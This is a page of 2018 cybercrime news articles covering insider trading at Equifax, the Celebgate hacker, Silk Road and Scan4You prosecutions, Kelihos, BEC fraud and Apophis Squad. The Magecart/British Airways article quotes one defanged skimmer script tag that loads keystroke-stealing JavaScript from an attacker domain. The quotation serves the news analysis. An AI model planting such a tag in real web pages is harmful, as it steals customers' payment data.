- Crime -

Last update 09.10.2017 13:47:49

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5 

Ex-Equifax Manager Gets Home Confinement for Insider Trading
19.10.2018 securityweek

A former Equifax manager was sentenced Tuesday to serve eight months home confinement for engaging in insider trading in the wake of the company’s massive data breach last year.

Sudhakar Reddy Bonthu, who worked as a software product development manager for the Atlanta-based credit-reporting agency, had pleaded guilty in July. U.S. District Judge Amy Totenberg also ordered Bonthu to pay a $50,000 fine, to serve 50 hours of community service and to forfeit the proceeds he gained from insider trading.

Born in Andhra Pradesh, India, Bonthu, 44, has lived in the United States since 2000. But he is not a U.S. citizen and faces possible deportation as a result of his felony conviction.

Hackers who haven’t been identified accessed Equifax databases without authorization from mid-May through July in 2017 and obtained customers’ personal information. Federal authorities say Equifax discovered the suspicious activity on its network on July 29, 2017.

The company ultimately revealed that the information of nearly 150 million Americans was exposed.

Bonthu and other Equifax employees were asked on Aug. 25, 2017, to help respond to the breach, but were told the work involved a potential Equifax customer, not Equifax itself, prosecutors have said.

Bonthu knew the target date for announcing the breach was Sept. 6. Bonthu used his wife’s brokerage account on Sept. 1 to buy 86 put options in Equifax stock that expired Sept. 15 for about $1,300, prosecutors said. Put options allow the holder to make a profit if the stock price drops.

After the share value plunged when the breach was publicly disclosed on Sept. 7, 2017, Bonthu exercised his put options and made a profit of about $75,000.

Bonthu also faced civil charges from the Securities and Exchange Commission and settled that case in July.

Another former Equifax employee also faces insider trading charges related to the breach. Jun Ying, former chief information officer of Equifax’s U.S. Information Solutions, was indicted in March. He has pleaded guilty and his case is pending. He also faces civil charges of insider trading from the SEC.

Equifax Chief Financial Officer John Gamble and three other executives sold shares worth a combined $1.8 million days after Equifax discovered suspicious activity on its network, but Equifax said an independent committee determined that these executives did not know of the breach when their trades were made.

Bonthu’s wife, addressing the judge during the sentencing hearing, questioned why her husband was being punished when top executives were not.

“He’s just a small fish in this whole game,” Rekha Vummadi said.

Bonthu also addressed the judge, saying he accepted responsibility for his actions and that he was sorry to Equifax stakeholders and to his family.

Totenberg said she had reviewed Bonthu’s history and read letters submitted by his family and former colleagues. Bonthu is clearly very intelligent and has contributed to his community and worked hard to build a good life for his family in this country, she said.

“I don’t know what got into you on this one occasion,” she said and speculated that Bonthu had suffered from the “infection of capitalism.”

Totenberg noted that perhaps the most serious consequence Bonthu faces — possible deportation — is something over which she has no control. With an eye toward potential immigration proceedings, she said for the record that she doesn’t see any evidence of moral turpitude, which can be grounds for deportation.

Ex-Virginia Teacher Charged in 2014 'Celebgate' Hacking
19.10.2018 securityweek

A former Virginia high school teacher is the fifth person charged in an investigation into the 2014 "celebgate" scandal in which hackers obtained nude photographs and other private information from more than 200 people, including celebrities.

Documents filed in federal court show that Christopher Brannan, 30, a former teacher at Lee-Davis High School, has agreed to plead guilty to charges of aggravated identity theft and unauthorized access to a protected computer.

The case was originally filed in Los Angeles, but was transferred to Virginia, where Brannan lives.

Thom Mrozek, a spokesman for the U.S. Attorney's Office in Los Angeles, confirmed Wednesday that Brannan is charged in the "celebgate" investigation.

Mrozek would not release the names of the celebrities. But at the time, actress Jennifer Lawrence acknowledged that she was a victim of the hack.

Mrozek said prosecutors have linked Brannan to the hacking, but not to the leak of nude photographs in 2014.

Lawrence contacted authorities after naked photos of her began appearing online. Actress Mary Elizabeth Winstead also confirmed that nude photos of her were posted online.

Under a plea agreement, Brannan's lawyer and prosecutors will recommend a prison sentence of nearly three years. A hearing is scheduled Monday in Richmond.

A statement of facts filed with Brannan's plea agreement says that between August 2013 and October 2014, in Los Angeles County, Virginia and elsewhere, Brannan hacked into internet and email accounts, including Apple iCloud, Yahoo! and Facebook. He was then able to obtain iCloud backups, photographs and other private information belonging to the victims.

The statement said Brannan would gain access to accounts by researching the social media accounts of victims to learn answers to their security questions to access their email accounts.

Brannan also admitted using fraudulent email addresses designed to look like Apple Inc. security accounts. The emails would ask the victims to provide their usernames and passwords to their internet accounts.

Because the emails appeared to be from Apple, the victims would provide the information. Brannan would then use it to access the victims' email accounts, where he obtained personal information, such as "sensitive and private photographs and videos."

Court documents do not include the names of the victims. A spokesman for prosecutors said the victims' names will not be released.

Brannan could not immediately be reached for comment. His lawyer, Abraham Del Rio III, did not respond to requests for comment.

Joshua Stueve, a spokesman for U.S. Attorney G. Zachary Terwilliger, said prosecutors will not release the names of the victims to protect their privacy.

Chris Whitley, a spokesman for Hanover County Public Schools, said Brannan worked at Lee-Davis High School in Mechanicsville, just outside Richmond, from August 2013 to June 2015.

Whitley told the Richmond Times-Dispatch that Brannan was immediately put on administrative leave in January 2015 after school officials were notified by the FBI of an investigation. He said school officials were not given details about the nature of the investigation.

Court documents say Brannan has also admitted hacking or trying to hack accounts of current and former teachers and students at the high school.

Silk Road Admin Pleads Guilty
8.10.2018 securityweek

An Irish man pled guilty in a United States court to his role in the administration of Silk Road, a black-market website.

The man, Gary Davis, 30, of Wicklow, Ireland, who went by the online handle of “Libertas,” was a member of the small administrative staff behind the Silk Road website. On Friday, he pled guilty to conspiring to distribute massive quantities of narcotics, a charge arising out of his admin role.

Silk Road, an online marketplace that operated between 2011 and 2013, was used by “thousands of drug dealers and other unlawful vendors to distribute illegal drugs and other illicit goods and services to more than 100,000 buyers,” the Department of Justice said in an announcement.

Owned by Ross William Ulbricht, also known as “Dread Pirate Roberts,” “DPR,” and “Silk Road,” the marketplace was also used to launder hundreds of millions of dollars derived from the unlawful transactions it hosted. Ulbricht was sentenced in 2015.

Silk Road, which was shut down in October 2013, was ran by a small support staff that included both site administrators and forum moderators, documents presented in court claim.

The admins would monitor user activity, respond to customer service inquiries, and resolve issues between buyers and vendors. The forum moderators monitored user activity on discussion forums, provided guidance on how to conduct business on Silk Road, and reported significant problems to admins.

The court documents allege that Davis served as a forum moderator for Silk Road between May 2013 and June 2013 and that he then served as a site admin up to October 2, 2013.

His responsibilities included responding to customer support requests, resolving disputes that arose between drug dealers and buyers on the site, and enforcing the rules for doing business on Silk Road, which had been set by Ulbricht. Davis was reportedly paid a weekly salary for his work.

Davis was extradited to the United States four years after his arrest, prosecutors announced in July. On Friday, he pled guilty before United States District Judge Jesse M. Furman to one count of conspiracy to distribute narcotics.

Davis faces a maximum sentence of 20 years in prison. His sentencing has been scheduled for January 17, 2019.

“As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace. Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution,” Geoffrey S. Berman, the United States Attorney for the Southern District of New York, said.

Silk Road admin pleaded guilty to drug trafficking charges and faces up to 20 years in prison
7.10.2018 securityaffairs

Gary Davis, one of the admins and moderators of the notorious Silk Road black marketplace, pleaded guilty to drug trafficking charges.
Gary Davis is an Irish national (20) who was one of the admins and moderators of the notorious Silk Road black marketplace, on Friday he pleaded guilty to drug trafficking charges.

“Geoffrey S. Berman, the United States Attorney for the Southern District of New York, announced that GARY DAVIS, a/k/a “Libertas,” pled guilty today to conspiring to distribute massive quantities of narcotics, a charge arising out of his role as a member of the small administrative staff of “Silk Road.” ” reads the DoJ press release.

“Manhattan U.S. Attorney Geoffrey S. Berman said: “Silk Road was a secret online marketplace for illegal drugs, hacking services, and a whole host of other criminal activity. As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace. Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution.”

Silk Road

The man, who is also known as Libertas, could face a maximum sentence of 20 years in prison. Davis also provided customer support to Silk Road users in 2013, for this job he received a weekly salary.

“From May 2013 up to June 2013, DAVIS served as a forum moderator for Silk Road. From June 2013 up to October 2, 2013, DAVIS worked as a site administrator on Silk Road. ” continues the press release.

“In his role as a site administrator, DAVIS’s responsibilities included (1) responding to customer support requests from Silk Road users who needed assistance with their buyer or seller accounts on the marketplace; (2) serving as an arbitrator by resolving disputes that arose between drug dealers and buyers on the site; and (3) enforcing the rules for doing business on Silk Road, which had been set by Ulbricht. “

Silk Road was seized by law enforcement in 2013 and his founder Ross William Ulbricht (aka Dread Pirate Roberts) was arrested, later it was sentenced to life in prison after being convicted on multiple counts related to the Silk Road activity.

According to FBI, between February of 2011 and July 2013, Silk Road managed $1.2 billion worth of transactions for 957,079 users, the total earning for Ulbricht was nearly $80 million.

According to the DoJ press release, more than $200 million worth of illegal drugs and other contraband were sold through the black market.

The FBI also seized about $33.6 million worth of Bitcoin that were sold by authorities in a series of auctions.

In November 2013, after the seizure of the original Silk Road, a new version of the popular black market was launched, so-called Silk Road 2.0, and Libertas was one of the administrators, but it is not clear is the pseudonymous was still used by Davis at the time.

Davis was identified and arrested in Ireland in January 2014, he made opposition to the extradition in the U.S. due to his mental health and fearing for his life. He was arguing that the extradition and consequent incarceration in the U.S. were violating his fundamental rights.

Davis was extradited to the United States in July 2014, he is expected to be sentenced on 17 January 2019 by Judge Furman.
“DAVIS, 30, of Wicklow, Ireland, pled guilty to one count of conspiracy to distribute narcotics, which carries a maximum sentence of 20 years in prison.” concludes the DoJ. “The maximum potential sentence in this case is prescribed by Congress and is provided here for informational purposes only, as any sentencing of the defendant will be determined by the judge. DAVIS is scheduled to be sentenced by Judge Furman on January 17, 2019 at 3:30 p.m.”

eCommerce Fraud Prevention Firm Forter Raises $50 Million
27.9.2018 securityweek

Forter, a company that specializes in preventing e-commerce fraud, on Wednesday announced that it raised $50 million in a series D funding round.

The round was led by March Capital Partners, with participation from Salesforce Ventures and previous investors Sequoia Capital, Scale Venture Partners and New Enterprise Associates. The money will be used to fuel the expansion of the company's fraud prevention platform.

The latest funding round brings the total raised by Forter since its launch in 2013 to $100 million.

Forter provides an AI-powered platform designed to identify fraud in real time. The company says its solution can differentiate legitimate customers from fraudsters based on a database of 175 million identities and a combination of 6,000 event and decision data points, including site visits, orders, account sign-ups, transaction data, account activity, buying patterns, and change of information.

Forter says its platform is capable of identifying attempts to hijack legitimate accounts, and attempts to abuse accounts, loyalty programs, and referrals and promos. It can also detect when fraudsters attempt to return goods for a full refund after using them.

A study conducted recently by the company showed that account takeover attempts increased by 53% in the last year.

Forter, which recently opened its first office in Europe, says it processes transactions totaling over $50 billion every year and its platform covers more than 180 million consumers in the United States.

Forter claims its customer base has tripled in the past year and that it includes Fortune 500 retailers and other companies in the U.S., Europe and Asia.

“We’ve been seeing a major trend of offline commerce shifting online and the Forter team has built a solution to detect and prevent fraud across the payments ecosystem with the advantage of next-generation technology that leverages machine learning,” said Jamie Montgomery, Managing Director at March Capital Partners. “We’re excited to be involved with a company on the forefront of their industry and to watch Forter evolve as the fraud landscape grows more complex.”

Darktrace Raises $50 Million at $1.65 Billion Valuation
27.9.2018 securityweek

UK-based Darktrace announced late on Wednesday that it has raised $50 million in a Series E funding round that values the company at $1.65 billion.

The latest financing round, which will help Darktrace drive further international expansion and development, was led by Vitruvian Partners with participation from existing investors KKR and 1011 Ventures.

The company has raised a total of nearly $230 million, including $18 million in March 2015, $22.5 million in July 2015, $65 Million in July 2016 and $75 million in July 2017.

Darktrace raises $50 million at $1.65 billion valuation

Darktrace technology leverages machine learning and AI algorithms to detect cyber threats in cloud, virtual, IoT and industrial environments. The company claims its solutions have self-learning capabilities, allowing them to quickly detect threats, including zero-days and malicious insiders.

The company has more than 30 offices worldwide and 750 employees – the number of employees has increased by 60% in the past year. Bloomberg reported earlier this month that the company expects to have roughly 1,000 employees by the end of the year.

Interestingly, Bloomberg cited Darktrace CEO Nicole Eagan saying that the company had not been pursuing fresh capital.

Darktrace says its technology currently protects over 7,000 networks – including at major airports and global financial institutions – and claims that adoption of its Antigena autonomous response solution has increased by 30% in the last quarter

“Darktrace has built a unique combination of world-class AI capabilities, deep cyber domain expertise, and a highly effective business model,” said Sophie Bower-Straziota, Managing Director at Vitruvian. “This has rapidly created scale and a leading edge over all competitors. Most excitingly, the sophistication and quality of Darktrace’s AI is evidenced by the rapid success of its autonomous response system, Antigena, the first of its kind in the market. We are delighted to be leading this financing round, as Darktrace represents exactly the type of highly innovative company Vitruvian seeks to invest behind and support.”

Operator of Counter AV Service Sentenced to 14 Years in Prison
24.9.2018 securityweek

A 38-year-old Latvian resident was sentenced last week in the United States to 168 months in prison for his role in operating a counter antivirus service called Scan4You.

Ruslans Bondars, a citizen of the former USSR, had been residing in Latvia when he was arrested in May 2017 along with Russian national Jurijs Martisevs. The men were accused of running Scan4You, a service designed to help cybercriminals test their malware to ensure that security products would not detect it.

A U.S. jury convicted Bondars in May on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.

He has now been sentenced to 14 years in prison, followed by three years of supervised release. The court is also expected to make a decision regarding forfeiture and paying restitution to victims.

This is one of the longest prison sentences handed by a U.S. court for cybercrimes. The longest ever prison sentence was handed to Roman Valeryevich Seleznev, the son of a Russian lawmaker. He was initially sentenced to 27 years in prison and he later received two other 14-year sentences.

Scan4You was active between 2009 and 2016, and it has been described as one of the largest counter AV services. Scan4You allowed cybercriminals to conduct 100,000 scans per month for $30. The service was also popular among counter antivirus resellers such as Indetectables, RazorScanner and reFUD.me.

Authorities said the service was used by thousands of users to test malware, including threats that infected tens of millions of devices and ones that helped cybercriminals carry out major operations aimed at U.S. businesses. The court established that the losses associated with Scan4You total over $20 billion.

It was not difficult for investigators to identify Bondars. He used the same Gmail account to register command and control (C&C) domains for malware and to create a Facebook account. That Gmail account also contained his real name and profile photo.

Martisevs pleaded guilty in March to conspiracy and aiding and abetting computer intrusions. His sentencing was scheduled for July, but the Justice Department has not provided any updates on the case.

Investigators believe an individual from Great Falls, Virginia, who has not been named, was also involved in running Scan4You.

Operator of Scan4You Malware-Scanning sentenced to 14 Years in prison
23.9.2018 securityaffairs

The Latvian expert Ruslans Bondars (37), who developed and run the counter antivirus service Scan4You has been sentenced to 14 years in prison.
Bondars was convicted of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“A Latvian “non-citizen,” meaning a citizen of the former USSR who resided in Riga, Latvia, was sentenced to 168 months in prison today for offenses related to his operation of “Scan4you,” an online counter antivirus service that helped computer hackers determine whether the computer viruses and other malicious software they created would be detected by antivirus software, announced Assistant Attorney General Brian A. ” reads the press release published by DoJ.

Scan4you is a VirusTotal like online multi-engine antivirus scanning service that could be used by vxers to test evasion abilities of their malware against the major antiviruses.

Unlike VirusTotal, Scan4you offered a totally anonymous service to its users, this means that data related to the scans of uploaded files were not shared with the antivirus firms.


Bondars is one of the two hackers found to have been running Scan4you from 2009 to 2016, its service was very popular in the cybercrime community and was used by malware developers to test their malicious codes.

Ruslans Bondars pleaded guilty on May 16 in federal court in Alexandria, according to a co-conspirator the man had helped Russian law enforcement.

The other hacker who operated the Scan4you service, Jurijs Martisevs, was arrested while on a trip to Latvia and extradited to the United States. The man pleaded guilty to the same Bondars’s charges in March 2018.

Scan4you service allows its customers to develop malicious codes that were used to steal millions of payment cards from retail stores across the world, it has been estimated that overall losses account for $20.5 billion.

“In issuing the sentence, the court found a loss amount of $20.5 billion. In addition to the term of imprisonment, U.S. District Judge Liam O’Grady ordered Bondars to serve three years of supervised release. A decision regarding forfeiture and payment of restitution to victims of the offenses is forthcoming.” continues the press release.

“A Scan4you customer, for example, used the service to test malware that was subsequently used to steal approximately 40 million credit and debit card numbers, as well as approximately 70 million addresses, phone numbers and other pieces of personal identifying information, from retail store locations throughout the United States, causing one retailer approximately $292 million in expenses resulting from the intrusion.”

The DoJ cited the case of Scan4you customer that used the service to test malware that was used to steal approximately 40 million credit and debit card numbers, and other personal information from a US retail store, causing $292 million in losses.

A second customer used Scan4you to contribute to the development of infamous Citadel malware that caused over $500 million in fraud-related losses.
“Ruslans Bondars helped malware developers attack American businesses,” explained Assistant Attorney General Benczkowski.

“The Department of Justice and its law enforcement partners make no distinction between service providers like Scan4You and the hackers they assist: we will hold them accountable for all of the significant harm they cause and work tirelessly to bring them to justice, wherever they may be located.”

China Arrests Suspect for Customer Data Leak at Accor Partner
22.9.2018 securityweek

Shanghai police have arrested a man in connection with a data leak at NASDAQ-listed Chinese hotelier Huazhu Group after the suspect failed to sell the information online.

The 30-year-old suspect had hacked and stolen user data from hotels under Huazhu Group and tried to sell it on overseas websites, the police said in a statement late Wednesday.

Huazhu, one of China's biggest hoteliers and the local partner of France-based AccorHotels, had alerted police to reports in August that the company's internal data was being sold online.

Huazhu Group said in a statement to the New York stock exchange on Monday that "the suspect also attempted to blackmail Huazhu by leveraging public pressure, without success".

The potentially-leaked data included guest membership information, personal IDs, check-in records, guest names, mobile numbers and emails.

Shanghai police said the case is under further investigation.

Huazhu operates more than 3,000 hotels in more than 370 cities in China, including the AccorHotels brands Ibis and Mercure.

The sale of personal information is common in China, which last year implemented a controversial cybersecurity law that requires services to store user data in China and receive approval from users before sharing their details.

Before Huazhu formed a long-term alliance with Accor in 2014 to help the French hotel group develop the Chinese market, it experienced another user data leak.

Xinhua reported check-in records from Huazhu and other hoteliers were stored by third parties and leaked in late 2013 due to management system loopholes.

Chinese e-commerce giant Alibaba came under fire earlier this year over its handling of user data in an episode that underscores growing concerns for privacy in the hyper-digitised country.

Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia
18.9.2018 securityaffairs

Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, Supreme Civil and Criminal Court of Greece overruled previous ones.
The Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, the decision has surprised the media because the man was expected to be extradited in the US or France as previously announces.

The decision of the Supreme Civil and Criminal Court of Greece has overruled previous ones that were taken by other Greek courts.

Russia, France, and the United States, where Vinnik is charged with different hacking crimes.

Greek Police have arrested the Russian national Alexander Vinnik (38) and they accuse the man of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering for more than $4 billion worth amount of Bitcoin (BTC) resulting from criminal activities, the US prosecutors requested his extradition in July 2017.

The Greek Supreme Court first opted out to extradite Vinnink to the US to face with the charges with the operation of an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused to be the responsible for the failure of the Japanese bitcoin exchange Mt. Gox.
Mt. Gox was the biggest Bitcoin exchange at the time of the shut down in 2014 that occurred after the platform was the victim of a series of cyber heists for a total of $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist, a Greek lower court agreed to extradite Vinnik to France to face with charges with hacking, money laundering, extortion and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country will look to a response.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”


The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he is facing around $10,000 worth of fraud charges, practically nothing compared the charges in the US and France.

Now, the decision of the Greek Supreme Court is disconcerting, Vinnik is going to be extradited to Russia.

The Supreme Court will analyze France’s request for extradition on September 19, but its decision could be overrun by the Greek Minister of Justice.

Nigerian Fraudster Who Stole Millions Heads to U.S. Prison
15.9.2018 securityweek Crime

A Nigerian man was sentenced in Manhattan federal court to 60 months in prison for his role in fraudulent business email compromise (BEC) scams, the United States Department of Justice announced this week.

The man, Onyekachi Emmanuel Opara, 30, of Lagos, Nigeria, was charged for defrauding thousands of victims of more than $25 million. He pleaded guilty to conspiracy to commit wire fraud and wire fraud in April.

In addition to the prison term, Opara was sentenced to two years of supervised release and was ordered to pay $2.5 million in restitution. His co-defendant, David Chukwuneke Adindu (“Adindu”), was sentenced in December 2017 to 41 months in prison and ordered to pay $1.4 million in restitution.

Between 2014 and 2016, Opara and Adindu engaged in multiple BEC scams that targeted victims worldwide, including the United States, the United Kingdom, Australia, Switzerland, Sweden, New Zealand, and Singapore.

As part of the scheme, Opara sent fake emails to employees of the victim companies, asking for funds to be transferred to specified bank accounts. The emails claimed to arrive from supervisors at those companies or from third party vendors the companies did business with.

“In reality, the emails were either sent from email accounts with domain names very similar to those of the companies and vendors, or the metadata for the emails was modified to make it appear as if the emails had been sent from legitimate email addresses,” the DoJ explains.

The fraudsters withdrew the funds immediately after the victims transferred them, or moved them to other bank accounts controlled by scheme participants. The fraudsters attempted to steal more than $25 million from their intended victims.

Opara also created accounts on dating websites and engaged in online romantic relationships with individuals in the United States by posing as a young attractive woman. Using this fake identity, he instructed individuals in the U.S. to send money overseas and/or to receive money fraudulently acquired through the BEC scams, and forward the proceeds to others.

One of the individuals who fell to this romantic relationship scheme sent over $600,000 of their own money to bank accounts controlled by scheme participants.

“Opara also attempted to recruit at least 14 other individuals via dating websites to receive funds from BEC scams into their bank accounts and then transfer the proceeds to overseas bank accounts,” the DoJ reveals.

The fraudster was arrested in December 2016, in Johannesburg, South Africa, and was extradited to the U.S. in January 2018.

Kelihos botmaster pleads guilty in U.S. District Court in Connecticut
14.9.2018 securityaffairs BotNet  Crime

The creator of the infamous Kelihos Botnet, Peter Yuryevich Levashov (38) pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.
Yuryevich Levashov (38), the botmaster of the dreaded Kelihos Botnet pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.

In April 2017, the United States Department of Justice announced that Peter Yuryevich Levashov (36) (also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov) was arrested in Barcelona for his involvement with the infamous Kelihos botnet. Levashov was extradited to the United States in February.

“Peter Yuryevich Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” 38, of St. Petersburg, Russia, pleaded guilty today in U.S. District Court in Hartford, Connecticut, to offenses stemming from his operation of the Kelihos botnet, which he used to facilitate malicious activities including harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software.” states the press release published by the DoJ.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.

kelihos botnet

According to a study conducted by CheckPoint Security, a malware landscape was characterized by some interesting changed in this first part of 2017.

The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.

Levashov has operated several botnets between since the late 1990s, for example, two other botnets tracked as Storm and Waledac borrow the code with Kelihos, both have been attributed to Levashov.

“For over two decades, Peter Levashov operated botnets which enabled him to harvest personal information from infected computers, disseminate spam, and distribute malware used to facilitate multiple scams,” said Assistant Attorney General Benczkowski.

“Mr. Levashov used the Kelihos botnet to distribute thousands of spam e-mails, harvest login credentials, and install malicious software on computers around the world,” said U.S. Attorney Durham. “He also participated in online forums on which stolen identities, credit card information and cybercrime tools were traded and sold. For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users. “

The DoJ speculated Levashov sent spam urging recipients to buy shares as part of a “pump and dump” scam, among other naughtiness.

The Russian hacker was accused to have used the Kelihos botnet for spam campaign that advertised various criminal schemes, including pump-and-dump stock fraud.

The activity conducted by the Kelihos, Storm and Waledac botnets was very profitable, prosecutors believe they allowed crooks to earn hundreds of millions of dollars

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”

The sentence has been scheduled for September 6, 2019, likely because the man is now helping law enforcement agencies on investigations on other cybercrime operations.

Romanian Court Rules Hacker Can be Extradited to US
12.9.2018 securityweek Crime

A Romanian court has ruled that a hacker known as Guccifer should be extradited to the U.S. to serve a 4½-year prison sentence.

The court in the central city of Alba Iulia ruled Monday that Romanian Marcel Lazar Lehel will be extradited after completing a seven-year sentence in Romania.

Guccifer gained global notoriety after he hacked the email accounts of U.S. officials including former Secretary of State Colin Powell and members of the Bush family.

He also claimed to have hacked the emails of Secretary of State Hillary Clinton, but prosecutors found no evidence of that. However, he was found to have hacked an email account of Sidney Blumenthal, a confidant of Clinton, in March 2013. The subsequent leak of Blumenthal's emails was the first time that outsiders became aware of Clinton's private "clintonemail.com" address, which she used to communicate with Blumenthal. It became part of the investigation into whether Clinton mishandled sensitive emails.

Lehel, 46, was sent to the U.S. in March 2016 and pleaded guilty to accessing the personal emails and social media accounts of some 100 U.S. citizens between 2012 and 2014 and releasing their private photographs and correspondence.

Among the Americans he hacked was "Sex and the City" author Candace Bushnell.

He was later sent back to Romania and is currently incarcerated in the city of Deva after he was sentenced for illegally accessing the email accounts of Romanian officials and public figures.

Monday's ruling can be appealed. Lehel previously said he wants to serve his U.S. prison sentence in Romania.

MageCart crime gang is behind the British Airways data breach
11.9.2018 securityaffairs Crime

An investigation conducted by researchers at RiskIQ revealed that the responsible of the British Airways data breach is a crime gang tracked as MageCart.
The responsible of the recently disclosed British Airways data breach is a crime gang tracked as MageCart. The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>
This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

The hackers used a dedicated infrastructure for this specific attack against the airline.

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately. This particular skimmer is very much attuned to how British Airway’s payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.” reads the analysis published by RiskIQ.

“The infrastructure used in this attack was set up only with British Airways in mind and purposely targeted scripts that would blend in with normal payment processing to avoid detection. We saw proof of this on the domain name baways.com as well as the drop server path. “

Experts analyzed all the scripts loaded by the website and searched for any evidence of recent changes.

The expert noticed some changes in the Modernizr JavaScript library, attackers added some lines of code at the bottom to avoid causing problems to the script. The JavaScript library was modified on August 21, 20:49 GMT.

The malicious script was loaded from the baggage claim information page on the British Airways website, the code added by the attackers allowed Modernizr to send payment information from the customer to the attacker’s server.

British Airways script

The script allowed the attacker to steal users’ data from both the website and the mobile app.

The data stolen from the British Airways was sent in the form of JSON to a server hosted on baways.com that resembles the legitimate domain used by the airline.

The attackers purchased an SSL certificate from Comodo to avoid raising suspicion.

“The domain was hosted on which is located in Romania and is, in fact, part of a VPS provider named Time4VPS based in Lithuania. The actors also loaded the server with an SSL certificate. Interestingly, they decided to go with a paid certificate from Comodo instead of a free LetsEncrypt certificate, likely to make it appear like a legitimate server:” continues RiskIQ.

At the time it is still unclear how MageCart managed to inject the malicious code in the British Airways website.

“As we’ve seen in this attack, Magecart set up custom, targeted infrastructure to blend in with the British Airways website specifically and avoid detection for as long as possible. While we can never know how much reach the attackers had on the British Airways servers, the fact that they were able to modify a resource for the site tells us the access was substantial, and the fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets.” concludes RiskIQ.

Police arrested Apophis Squad member responsible for ProtonMail DDoS attack
8.9.2018 securityaffairs Crime

UK NCA arrested a member of the Apophis Squad hacker group that launched distributed denial-of-service (DDoS) attacks against many organizations, including ProtonMail.
The U.K. National Crime Agency (NCA) announced the arrest of the 19-year-old George Duke-Cohan from Hertfordshire that was involved in the ProtonMail DDoS attack.

The teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,”was arrested on August 31 and is still in custody after he pleaded guilty to three counts of making hoax bomb threats.

According to the investigator, the young man is the leader of the Apophis Squad, which is the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

“Yesterday at Luton Magistrates Court, George Duke-Cohan, 19, pleaded guilty to three counts of making hoax bomb threats following an investigation by the National crime Agency.
Duke-Cohan sent the bomb threats that resulted in over 400 schools in the UK being evacuated in March 2018 for which he was arrested just days later.” reads the announcement published by the NCA.

“In April whilst under investigation, he sent a mass email to schools in the UK and the US claiming that pipe bombs had been planted on the premises.”

He has admitted making bomb threats to thousands of schools and a United Airlines flight travelling from the UK to San Francisco in August.

The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

ProtonMail was hit by a massive DDoS attack in June that caused some delays to the operations of the company, the offensive was mitigated with the help of the security firm Radware.

Apophis Squad attack

ProtonMail Founder Andy Yen confirmed that his company helped law enforcement for identifying Duke-Cohan and other members of the group that were all ironically using the ProtonMail service.

Brian Krebs also provided precious information that helped the NCA in identifying the teenager in earlier August.

“What we found, combined with intelligence provided by renowned cyber security journalist Brian Krebs, allowed us to conclusively identify Duke-Cohan as a member of Apophis Squad in the first week of August, and we promptly informed law enforcement,” Protonmail wrote in a blog post.

“British police did not move to immediately arrest Duke-Cohan however, and we believe there were good reasons for that. Unfortunately, this meant that through much of August, ProtonMail remained under attack, but due to the efforts of Radware, ProtonMail users saw no impact.”

ProtonMail CEO believes further charges are pending, along with possible extradition to the US.

